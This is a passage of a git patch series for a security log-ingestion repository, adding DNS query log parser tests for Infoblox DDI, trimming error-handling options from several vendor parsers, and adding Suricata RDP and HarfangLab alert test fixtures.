IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.org", + "registered_domain": "test.org", + "subdomain": "test", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 40432 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json new file mode 100644 index 000000000..b695d7a1a --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_7.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;" + }, + "expected": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.dev", + "registered_domain": "test.dev", + "top_level_domain": "dev", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.dev" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 49943 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json new file mode 100644 index 000000000..2204069d9 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_8.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;", + "@timestamp": "2024-11-28T15:26:27.498000Z", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "PD2LORA2.enim.l2", + "subdomain": "PD2LORA2.enim", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "PD2LORA2.enim.l2" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 36615 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json new file mode 100644 index 000000000..f4a0e6e07 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_9.json @@ -0,0 +1,35 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;", + "@timestamp": "2024-11-28T15:26:27.359000Z", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "www.bing.com", + "registered_domain": "bing.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "www.bing.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63175 + } + } +} \ No newline at end of file From 122c55a987f7f2ba91d921fd34af5050cf4b613a Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Fri, 29 Nov 2024 12:50:58 +0200 Subject: [PATCH 107/150] Fix smart description --- Infoblox/ddi/_meta/smart-descriptions.json | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json index 32aeb23c0..2b9898cb2 100644 --- a/Infoblox/ddi/_meta/smart-descriptions.json +++ b/Infoblox/ddi/_meta/smart-descriptions.json @@ -16,5 +16,24 @@ "type": "request resolution of" } ] + }, + { + "value": "{source.ip} perform {event.action}", + "conditions": [ + { + "field": "source.ip" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "Query on {source.ip}", + "conditions": [ + { + "field": "source.ip" + } + ] } ] From b226271306378a02784a4671bf577fa3c8472e0e Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Fri, 29 Nov 2024 15:45:31 +0200 Subject: [PATCH 108/150] Fix comments --- Aruba Network/aruba-os/ingest/parser.yml | 7 ------- Cisco/cisco-ise/ingest/parser.yml | 8 -------- Cisco/cisco-meraki/ingest/parser.yml | 12 ------------ Cisco/cisco-secure-firewall/ingest/parser.yml | 3 --- Cisco/cisco-secure-web-appliance/ingest/parser.yml | 3 --- Citrix/citrix-adc/ingest/parser.yml | 5 ----- EfficientIP/solidserver-ddi/ingest/parser.yml | 3 --- 7 files changed, 41 deletions(-) diff --git a/Aruba Network/aruba-os/ingest/parser.yml b/Aruba Network/aruba-os/ingest/parser.yml index 7c22ea1e7..8f38ca817 100644 --- a/Aruba Network/aruba-os/ingest/parser.yml +++ b/Aruba Network/aruba-os/ingest/parser.yml @@ -4,14 +4,12 @@ pipeline: external: name: grok.match properties: - raise_errors: false pattern: '%{DATA:prefix}\:\s*%{USERNAME:obs}\s*\:\s*%{GREEDYDATA:payload}\s*' - name: parse_auth_message external: name: grok.match properties: - raise_errors: false input_field: "parse_message.message.payload" pattern: ".*?User '%{USERNAME:user_name}'.*from %{IP:src_ip}.*" filter: "{{ parse_message.message.prefix.lower() == 'auth' }}" @@ -22,7 +20,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'mgr' }}" - name: parse_ssl_message @@ -31,7 +28,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'ssl' }}" - name: parse_sntp_message @@ -40,7 +36,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?at %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'sntp' }}" - name: parse_snmp_message @@ -49,7 +44,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'snmp' }}" - name: parse_dhcp_snoop_message @@ -58,7 +52,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?%{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'dhcp-snoop' }}" - name: set_ecs_fields diff --git a/Cisco/cisco-ise/ingest/parser.yml b/Cisco/cisco-ise/ingest/parser.yml index 218053f07..015a469be 100644 --- a/Cisco/cisco-ise/ingest/parser.yml +++ b/Cisco/cisco-ise/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: original.message output_field: pre_message pattern: "%{DATA:status}:%{GREEDYDATA:reason_with_kv}" @@ -14,7 +13,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: time_message pattern: "%{DATA:start_of_msg}: %{DATA:reason},%{GREEDYDATA:end_of_msg}" @@ -24,7 +22,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcome pattern: " MESSAGE=%{DATA:outcome_msg}," @@ -34,7 +31,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcomes pattern: " MESSAGE=%{DATA:outcome_msg} threshold_space = %{DATA:threshold_space}, used_space = %{DATA:used_space}," @@ -44,7 +40,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: message pattern: "%{DATA:reason}:%{GREEDYDATA:kv}" @@ -54,7 +49,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parsed_event.message.reason.strip()}}" output_field: conf_result pattern: "Configuration %{WORD:change}" @@ -64,7 +58,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{parsed_event.message.kv.strip()}}" output_field: result value_sep: "=" @@ -75,7 +68,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: '{{parsed_kv_sentence.result.get("NAS Identifier")}}' output_field: adress_mac pattern: "%{MAC:adress}:%{GREEDYDATA:word}" diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml index 8b06aa6bc..7f3baaa74 100644 --- a/Cisco/cisco-meraki/ingest/parser.yml +++ b/Cisco/cisco-meraki/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{original.message}}" output_field: message pattern: >- @@ -21,7 +20,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message value_sep: "=" @@ -31,7 +29,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{kv_part_message.message.src}}" output_field: message pattern: "^%{IP:src_ip}:%{NUMBER:src_port}$" @@ -40,7 +37,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{kv_part_message.message.dst}}" output_field: message pattern: "^%{IP:dst_ip}:%{NUMBER:dst_port}$" @@ -56,7 +52,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^%{WORD:action}\s%{GREEDYDATA}$ @@ -67,7 +62,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^(%{WORD:log_subtype}|type=%{WORD:log_subtype})\s%{GREEDYDATA}$ @@ -78,7 +72,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -93,7 +86,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -107,7 +99,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -121,7 +112,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -134,7 +124,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -150,7 +139,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index 00b0ffdce..04ce99510 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "original.message" output_field: pre_message pattern: '((<[0-9]+>)?(%{SYSLOGTIMESTAMP:timestamp}|%{TIMESTAMP_ISO8601:timestamp})?(%{IP:log_ip})?(%{SPACE}%{DATA:log_hostname}%{SPACE})?(\:)?\%%{PRODUCT_NAME:product}\-[0-9]{1}\-%{MESSAGE_NUMBER:message_number_grok}\: %{GREEDYDATA:raw_message})|\s?%{GREEDYDATA:raw_message}' @@ -17,7 +16,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: message pattern: "%{Group_1}|%{Group_2}|%{Group_3}|%{Group_4}|%{Group_5}|%{Group_6}|%{Group_7}|%{Group_8}|%{Group_9}|%{Group_10}" @@ -171,7 +169,6 @@ pipeline: external: name: kv.parse-kv properties: - raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: parse_kv2_field value_sep: ':\s' diff --git a/Cisco/cisco-secure-web-appliance/ingest/parser.yml b/Cisco/cisco-secure-web-appliance/ingest/parser.yml index 6f782efa3..18e6dd0c1 100644 --- a/Cisco/cisco-secure-web-appliance/ingest/parser.yml +++ b/Cisco/cisco-secure-web-appliance/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: original.message output_field: message pattern: '%{PREFIX}%{NUMBER:timestamp}\s+%{NUMBER:elapsed}\s+%{IP:source_ip}\s+%{WORD:code}/%{NUMBER:status}\s+%{NUMBER:http_response_bytes}\s+%{WORD:method}\s+%{NOTSPACE:url}\s+%{NOTSPACE:username}\s+%{NOTSPACE:hierarchy_code}/(%{IP:peerhostip}|%{NOTSPACE:peerhost})\s+%{NOTSPACE:mime_type}\s+%{NOTSPACE:acl_decision}\s+<%{VERDICT:scanning_verdict_information}>\s+%{DATA:user_agent}.*' @@ -23,7 +22,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: parsed_event.message.acl_decision output_field: result pattern: "%{WORD:decision_tag}-%{WORD:policy_group_name}-%{WORD:policy_identity}-%{WORD:outbound_malware_scanning_policy}-%{WORD:data_security_policy}-%{WORD:external_dlp_policy}-%{WORD:routing_policy}" @@ -32,7 +30,6 @@ pipeline: external: name: dsv.parse-dsv properties: - raise_errors: false input_field: "{{parsed_event.message.scanning_verdict_information}}" output_field: results columnnames: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 712394227..9c6c377a7 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -12,7 +12,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false output_field: message pattern: '\"?\s*%{HEADER:header}\s+:\s+%{WORD:mode}\s+%{WORD:type} %{WORD:message_type} %{NUMBER:n1} %{NUMBER:n2} :\s+%{GREEDYDATA:payload}\"?' custom_patterns: @@ -45,7 +44,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{SOURCE}%{SEP}(%{VSERVER}%{SEP})?(%{NAT}%{SEP})?%{DEST}.*%{BYTES_SEND}.*%{BYTES_RECV}.*" @@ -62,7 +60,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{OPTION_1}|%{OPTION_2}|%{OPTION_3}" @@ -76,7 +73,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*" @@ -87,7 +83,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*ClientIP %{IP:src_ip}.*ClientPort %{POSINT:src_port}.*VserverServiceIP %{IP:vserver_ip}.*VserverServicePort %{POSINT:vserver_port}.*ClientVersion %{WORD:tls_version}.*CipherSuite %{CIPHER_SUITE:tls_suite}.*" diff --git a/EfficientIP/solidserver-ddi/ingest/parser.yml b/EfficientIP/solidserver-ddi/ingest/parser.yml index 219f81146..3c5ddd91e 100644 --- a/EfficientIP/solidserver-ddi/ingest/parser.yml +++ b/EfficientIP/solidserver-ddi/ingest/parser.yml @@ -4,7 +4,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false output_field: message pattern: "%{EFFICIENTIP_DNS_QUERY}|%{EFFICIENTIP_DNS_ANSWER_1}|%{EFFICIENTIP_DNS_ANSWER_DEFAULT}|%{EFFICIENTIP_DNS_UPDATING_ZONE}|%{EFFICIENTIP_DNS_GUARDIAN}|%{EFFICIENTIP_DNS_GUARDIAN_LISTLOG}|%{EFFICIENTIP_RPZ_TRANSFER}|%{EFFICIENTIP_RPZ_ZONE}|%{EFFICIENTIP_RPZ_QNAME}|%{EFFICIENTIP_DNS_ERROR}|%{EFFICIENTIP_DNS_FORMAT_ERROR}|%{EFFICIENTIP_DNS_RECEIVED_NOTIFY}" custom_patterns: @@ -41,7 +40,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_HTTPS}.*" @@ -54,7 +52,6 @@ pipeline: external: name: grok.match properties: - raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_RRSIG}.*" From 81af8ce7ab0e33cdb80e2a599e2a417641a45c5d Mon Sep 17 00:00:00 2001 From: Erwan Chevalier Date: Fri, 29 Nov 2024 16:20:57 +0100 Subject: [PATCH 109/150] fix(suricata): missing rdp smart description --- .../suricata/_meta/smart-descriptions.json | 16 ++++++ Suricata/suricata/tests/rdp.json | 57 +++++++++++++++++++ 2 files changed, 73 insertions(+) create mode 100644 Suricata/suricata/tests/rdp.json diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json index fc89638e0..b330a23c1 100644 --- a/Suricata/suricata/_meta/smart-descriptions.json +++ b/Suricata/suricata/_meta/smart-descriptions.json @@ -198,6 +198,22 @@ } ] }, + { + "value": "RDP traffic from {source.ip} to {destination.ip}", + "conditions": [ + { + "field": "action.type", + "value": "rdp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "requested" + } + ] + }, { "value": "Traffic flow from {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}", "conditions": [ diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json new file mode 100644 index 000000000..131dd7025 --- /dev/null +++ b/Suricata/suricata/tests/rdp.json @@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Suricata", + "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3" + } + } + }, + "expected": { + "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}", + "event": { + "category": [ + "network" + ], + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-29T15:08:06.239558Z", + "action": { + "type": "rdp" + }, + "destination": { + "address": "10.0.1.4", + "ip": "10.0.1.4", + "port": 3389 + }, + "host": { + "ip": "14.225.46.243" + }, + "network": { + "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=", + "protocol": "TCP", + "transport": "TCP" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth0" + } + } + }, + "related": { + "ip": [ + "10.0.1.4", + "14.225.46.243" + ] + }, + "source": { + "address": "14.225.46.243", + "ip": "14.225.46.243", + "port": 58953 + } + } +} \ No newline at end of file From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 29 Nov 2024 17:16:26 +0100 Subject: [PATCH 110/150] fix(Harfanglab): add event.kind: 'alert' for harfanglab alerts --- HarfangLab/harfanglab/ingest/parser.yml | 1 + HarfangLab/harfanglab/tests/alert_5.json | 1 + 2 files changed, 2 insertions(+) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 93671efde..5050c7429 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -229,6 +229,7 @@ stages: alert_info: actions: - set: + event.kind: "alert" harfanglab.level: "{{json_event.message.level}}" rule.description: "{{json_event.message.msg}}" rule.name: "{{json_event.message.rule_name}}" diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json index 0f68a7c8c..19abfe567 100644 --- a/HarfangLab/harfanglab/tests/alert_5.json +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -12,6 +12,7 @@ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", "event": { "dataset": "alert", + "kind": "alert", "type": [ "info" ] From 526f76676800e8db48495abb88e3981595473e3d Mon Sep 17 00:00:00 2001 From: Antoine Ryon Date: Sat, 30 Nov 2024 09:50:19 +0100 Subject: [PATCH 111/150] DNS answers handling and additional improvements --- Infoblox/ddi/ingest/parser.yml | 44 +++++++++--- Infoblox/ddi/tests/query_log_dns_2.json | 3 + Infoblox/ddi/tests/query_log_dns_3.json | 3 + Infoblox/ddi/tests/query_log_dns_4.json | 3 + Infoblox/ddi/tests/query_log_dns_5.json | 12 ++++ Infoblox/ddi/tests/query_log_dns_6.json | 47 +++++++++++++ Infoblox/ddi/tests/query_log_dns_7.json | 3 + Infoblox/ddi/tests/query_log_dns_8.json | 12 ++++ Infoblox/ddi/tests/query_log_dns_9.json | 89 +++++++++++++++++++++++++ 9 files changed, 206 insertions(+), 10 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 2fb950af6..e54b3ef79 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -5,7 